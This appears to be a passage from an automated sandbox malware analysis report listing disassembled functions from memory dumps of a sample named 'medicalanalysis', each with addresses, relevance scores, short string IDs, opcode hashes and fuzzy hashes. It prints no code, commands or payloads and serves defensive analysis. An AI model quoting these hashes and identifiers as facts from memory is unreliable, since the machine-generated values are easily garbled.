                                                                                                                                                                                                                                                                                                              Function 057C3668 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228715270.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_57c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 0Nj
                                                                                                                                                                                                                                                                                                              • API String ID: 0-414701135
                                                                                                                                                                                                                                                                                                              • Opcode ID: bf387d78344c5485e9993dac883ed5a6c08f85b7086563ee3bc01d42b8626cc1
                                                                                                                                                                                                                                                                                                              • Instruction ID: 1c16f5f395ee1d7ae6738c5da82f8a31509261ec83f583ed82f65584beb0b700
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bf387d78344c5485e9993dac883ed5a6c08f85b7086563ee3bc01d42b8626cc1
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DCB1E574E05208CFCB14DFA8D5886ADBBF6FB89300F20886EE416AB394D7346A45DF51
                                                                                                                                                                                                                                                                                                              Function 021B5DA1 Relevance: 1.5, Strings: 1, Instructions: 247COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2218058169.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_21b0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: PH^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-2549759414
                                                                                                                                                                                                                                                                                                              • Opcode ID: ec63b2a12fd522df18aa5899adb7efced25866bfb2d8012f9c4bd21e9ad5e42a
                                                                                                                                                                                                                                                                                                              • Instruction ID: d308e30b0f518688b8c2a86888566d50ab4d2301c95b3febe3e539e351c0ef88
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ec63b2a12fd522df18aa5899adb7efced25866bfb2d8012f9c4bd21e9ad5e42a
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D7D18C78D44268CFDB65DF65C898B99BBB2BF49309F1090EAD44DA3250DB744AC5CF01
                                                                                                                                                                                                                                                                                                              Function 0579C918 Relevance: 1.5, Strings: 1, Instructions: 228COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 4'^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-1614139903
                                                                                                                                                                                                                                                                                                              • Opcode ID: 19d3691b017c753913de856cab69a163fdf39fdc473197480e1ae0d7ddd03e83
                                                                                                                                                                                                                                                                                                              • Instruction ID: 50ef7331d2f66d4965e762604bfdfac8011cb330b40bfc360d2543853041780b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19d3691b017c753913de856cab69a163fdf39fdc473197480e1ae0d7ddd03e83
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 08A1FD34A10218DFDF09DFA4E89899DBBB6FF89300F558159E806AB365DF30AC42DB51
                                                                                                                                                                                                                                                                                                              Function 057924A8 Relevance: 1.5, Strings: 1, Instructions: 226COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: pbq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-3896149868
                                                                                                                                                                                                                                                                                                              • Opcode ID: 3176a7f266f192c9730120bafbbb025197841f613fae676460b413cd6bc65f8b
                                                                                                                                                                                                                                                                                                              • Instruction ID: dcc31530e2e1370317808195e0332ad117c7a46cc215519cd95e969d3f80e98a
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3176a7f266f192c9730120bafbbb025197841f613fae676460b413cd6bc65f8b
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65718C76604140AFCB0AAF68D854D197FB6FF9931471684D9E209CB2B3DA32DC12EB61
                                                                                                                                                                                                                                                                                                              Function 057C3659 Relevance: 1.4, Strings: 1, Instructions: 197COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228715270.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_57c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 0Nj
                                                                                                                                                                                                                                                                                                              • API String ID: 0-414701135
                                                                                                                                                                                                                                                                                                              • Opcode ID: c49c30d3b42b9c0831efd19ae982f89413a977a02f284cc11238962b7fb1e8c2
                                                                                                                                                                                                                                                                                                              • Instruction ID: e45c939da7b0eef12613fd0837497ec81f26b3c476318ff883ebd7b30497e820
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c49c30d3b42b9c0831efd19ae982f89413a977a02f284cc11238962b7fb1e8c2
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A981E470E09248CFCB14DFA8D5486ADBFF6BB85300F10886EE416AB390D7345A45EF51
                                                                                                                                                                                                                                                                                                              Function 05793570 Relevance: 1.4, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: (bq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-149360118
                                                                                                                                                                                                                                                                                                              • Opcode ID: 58efffbed31741489309bc2144e665705d46460790771c79c5760f2c104aa555
                                                                                                                                                                                                                                                                                                              • Instruction ID: 1320b797b887204f853e7c9ec808232a0bbf46bf9ee4b6516788c086749140b3
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 58efffbed31741489309bc2144e665705d46460790771c79c5760f2c104aa555
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1951F435B005158FCB04DF68D484AAABBF2FF89320F158969E925DB381DB30F851DBA1
                                                                                                                                                                                                                                                                                                              Function 0579ECF0 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: (bq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-149360118
                                                                                                                                                                                                                                                                                                              • Opcode ID: 0d7bc79eb34512feaf35db2aa0b2ca33370fa337262a02dd9d791d6d5ed9b6c7
                                                                                                                                                                                                                                                                                                              • Instruction ID: a1c3239d7dedcdb4504a47cba73dd5f16bd2585a74dfa051e5b4e85871fc8418
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d7bc79eb34512feaf35db2aa0b2ca33370fa337262a02dd9d791d6d5ed9b6c7
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3551D8317082558FDB58DF39D858A2E3BEAFFC96107154069E946CB3A2CE34DD02EB61
                                                                                                                                                                                                                                                                                                              Function 057925B0 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: pbq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-3896149868
                                                                                                                                                                                                                                                                                                              • Opcode ID: f05957ac7fc3badbfba055436ce866bbdbbba9b7998d4014ed0b754794c3f510
                                                                                                                                                                                                                                                                                                              • Instruction ID: 56ae6b37b5d31aea8bbf8bb874574c386c244a95d04d410ca227b565f315702c
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f05957ac7fc3badbfba055436ce866bbdbbba9b7998d4014ed0b754794c3f510
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 45514B76600104AFCB49AFA8D954D297BF7FF8C31471680D4E2099B376DA32DC22EB51
                                                                                                                                                                                                                                                                                                              Function 057925A0 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: pbq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-3896149868
                                                                                                                                                                                                                                                                                                              • Opcode ID: 713e6662d28a7c9542d7e1c7c99234960a43895f491f4fd54b3b5f4d9f6af006
                                                                                                                                                                                                                                                                                                              • Instruction ID: 194e62a8b29f72d4905b7da147f1b8a1a78d7c25bea4b1c09e93bd1892bc810c
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 713e6662d28a7c9542d7e1c7c99234960a43895f491f4fd54b3b5f4d9f6af006
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03514B7A600100AFCB0AAF98D954D257BA7FF8D32471A80D5E2098F377D632DC62EB51
                                                                                                                                                                                                                                                                                                              Function 05794450 Relevance: 1.4, Strings: 1, Instructions: 113COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: ,bq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-2474004448
                                                                                                                                                                                                                                                                                                              • Opcode ID: dc4f9e5c57c619c1afd83bf80dc6e76a4d2d6c023345aa8fd329e0b7c577c412
                                                                                                                                                                                                                                                                                                              • Instruction ID: a030eabe2582e50fa7e6780e1b99d7fc9e86f85bc9f787348b1374582c415340
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dc4f9e5c57c619c1afd83bf80dc6e76a4d2d6c023345aa8fd329e0b7c577c412
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B417935B001058FCF15DFA9D8549AEBBE2FF89311B21806AE9059B361DB71EC02CBA1
                                                                                                                                                                                                                                                                                                              Function 0579B998 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 4'^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-1614139903
                                                                                                                                                                                                                                                                                                              • Opcode ID: 94df01c7e75718a1a490d34b8c23c209615b7fc11e60cda39512fbe4a3c6fbad
                                                                                                                                                                                                                                                                                                              • Instruction ID: 889dd3640c1142d83e39a84a42234510eaf47eb3ce0a6227eb8c9d1c5a0397f6
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 94df01c7e75718a1a490d34b8c23c209615b7fc11e60cda39512fbe4a3c6fbad
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 46318E31B042049FCF199FA4E898E59BFB6FF88310B0580A9E9099B375DA31DC52DB91
                                                                                                                                                                                                                                                                                                              Function 05792A4B Relevance: 1.3, Strings: 1, Instructions: 91COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 03j
                                                                                                                                                                                                                                                                                                              • API String ID: 0-2183582196
                                                                                                                                                                                                                                                                                                              • Opcode ID: 7ccbba00fb1a9fb906d3037054db4447580aba3bd31d928bb35e27d578a0f68c
                                                                                                                                                                                                                                                                                                              • Instruction ID: de95b8b5c5d19b894af8120d6c0986f7cf1dfa8d20e030f32c5f7b8876b5376a
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7ccbba00fb1a9fb906d3037054db4447580aba3bd31d928bb35e27d578a0f68c
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72213B367042416FDB196F28E880A6A7FA7EFC5320B54407AE905CB352DE71CC02D3A1
                                                                                                                                                                                                                                                                                                              Function 057CF798 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228715270.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_57c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 0Nj
                                                                                                                                                                                                                                                                                                              • API String ID: 0-414701135
                                                                                                                                                                                                                                                                                                              • Opcode ID: 5993a5d744c7f3431a494cd85edef851ab351871a7aa2c1d5d11627b2a9e4a08
                                                                                                                                                                                                                                                                                                              • Instruction ID: 69bb9fefab51331b2523fe8a694e7113775cac781003a37a2c33106a0615047f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5993a5d744c7f3431a494cd85edef851ab351871a7aa2c1d5d11627b2a9e4a08
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D731F074E04209CFDB04DFA9D485AEEBBF6AB89300F50D46AD419A7394DB349A419F90
                                                                                                                                                                                                                                                                                                              Function 021B2CE8 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2218058169.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_21b0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 0Nj
                                                                                                                                                                                                                                                                                                              • API String ID: 0-414701135
                                                                                                                                                                                                                                                                                                              • Opcode ID: d9814b7ee7c30bc6a113b7c055d2785283619f895d5a13c87479db3492ab8247
                                                                                                                                                                                                                                                                                                              • Instruction ID: 6add35714f0765c3c246682490b5623d53f176fd3753689d78ae03fa982f5548
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d9814b7ee7c30bc6a113b7c055d2785283619f895d5a13c87479db3492ab8247
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D9318BB0948249CFDB06DFA8C4887EDBBF1FF49304F2084AAD815A7294D7B54A49CF11
                                                                                                                                                                                                                                                                                                              Function 05792958 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 03j
                                                                                                                                                                                                                                                                                                              • API String ID: 0-2183582196
                                                                                                                                                                                                                                                                                                              • Opcode ID: 36ea104ee3c0f381661ee7a0ef2f2fffc4167fa324907211990b1673b5e8bf00
                                                                                                                                                                                                                                                                                                              • Instruction ID: 2443ce8a9773922fdf7404ceb0951acb7b13996483c2184704eeeeb7a296a066
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 36ea104ee3c0f381661ee7a0ef2f2fffc4167fa324907211990b1673b5e8bf00
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD218035A00209EFCF199F58D5589ED7FB2FB88720F148129E815B7391DB319841EBA0
                                                                                                                                                                                                                                                                                                              Function 05751E8E Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228162929.0000000005750000.00000040.00000800.00020000.00000000.sdmp, Offset: 05750000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5750000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 4'^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-1614139903
                                                                                                                                                                                                                                                                                                              • Opcode ID: f03eb0a3417003f6e88cf66dba761bf6d3ccd0f014d4c562e5d25863ec16abcf
                                                                                                                                                                                                                                                                                                              • Instruction ID: ebca3cf118627bc4296f23fa227219cc8f927814fafbd8162f916b7bd6397424
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f03eb0a3417003f6e88cf66dba761bf6d3ccd0f014d4c562e5d25863ec16abcf
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C319E74D08209CFCB14DFA9D4087BEBBB2FF45322F40846AE811A7251CBB41945DF51
                                                                                                                                                                                                                                                                                                              Function 021B2CF8 Relevance: 1.3, Strings: 1, Instructions: 75COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2218058169.00000000021B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 021B0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_21b0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 0Nj
                                                                                                                                                                                                                                                                                                              • API String ID: 0-414701135
                                                                                                                                                                                                                                                                                                              • Opcode ID: 2edca7cb608bbd95454bbdf14301134170612f110ac51623182883ed285f407b
                                                                                                                                                                                                                                                                                                              • Instruction ID: df64ab197dc5dfe3f9b3e1f633f261524ac94a2b751d9a7af288d5cba70a6515
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2edca7cb608bbd95454bbdf14301134170612f110ac51623182883ed285f407b
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 393148B0944209DFDB05EFA8C4887EEBBF5FF89304F2084AAD815A7254D7B58A48CF11
                                                                                                                                                                                                                                                                                                              Function 057970B0 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: p<^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-1680888324
                                                                                                                                                                                                                                                                                                              • Opcode ID: 4ca0c7360be4769256d412a89d51451bdb24a64ea035837028d31027e5f1a50c
                                                                                                                                                                                                                                                                                                              • Instruction ID: 0a9f6cd49932e68305b2a130faff3a05e0a8619e43c4326c362a55c676f0b77f
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4ca0c7360be4769256d412a89d51451bdb24a64ea035837028d31027e5f1a50c
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: FB2149713142549FCF09CF2ED884AAA7BEAFF8A210B1480A5F845CB360DA31DC51DB20
                                                                                                                                                                                                                                                                                                              Function 057970C0 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: p<^q
                                                                                                                                                                                                                                                                                                              • API String ID: 0-1680888324
                                                                                                                                                                                                                                                                                                              • Opcode ID: 5a4aa069828b2f92e5316e61e49222e2985b2f2b10bddd2dabb72a1514f8e0bc
                                                                                                                                                                                                                                                                                                              • Instruction ID: af6d1b6abf71281a8baa186a3ec84f282522d73b6ddec292e3b071d6356a8a5b
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5a4aa069828b2f92e5316e61e49222e2985b2f2b10bddd2dabb72a1514f8e0bc
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C62128313141949FCF09CF2ED884AAA7BEAFF8A310B058095F855CB261DA35DC51EB30
                                                                                                                                                                                                                                                                                                              Function 05794440 Relevance: 1.3, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228397978.0000000005790000.00000040.00000800.00020000.00000000.sdmp, Offset: 05790000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_5790000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: ,bq
                                                                                                                                                                                                                                                                                                              • API String ID: 0-2474004448
                                                                                                                                                                                                                                                                                                              • Opcode ID: 2f518c834bfe91ec8e2e60e5c4f4a145d9137b298d62cb1ff6978840b0676e41
                                                                                                                                                                                                                                                                                                              • Instruction ID: e5ef24436b7a0737abfd60b2fbf281add1349a624c2b28ee4d28043e8acd05e1
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2f518c834bfe91ec8e2e60e5c4f4a145d9137b298d62cb1ff6978840b0676e41
                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F117F35A011159FCF04DF69D9549ABBBB6FF89301F118065E9059B361DB70EC02CBA1
                                                                                                                                                                                                                                                                                                              Function 057CE968 Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2228715270.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_57c0000_medicalanalysis.jbxd
                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                                                                                              • String ID: 0Nj
                                                                                                                                                                                                                                                                                                              • API String ID: 0-414701135
                                                                                                                                                                                                                                                                                                              • Opcode ID: 10d8925c3c6ae0c0ee43dc727b8383b07835ccdefc1d5dddc96fa4a501de9c61
                                                                                                                                                                                                                                                                                                              • Instruction ID: e87e4c7629510f2935f56f99b808ba2f2b1ef29dec4148ddfdc7ae7345b0eec0
                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10d8925c3c6ae0c0ee43dc727b8383b07835ccdefc1d5dddc96fa4a501de9c61
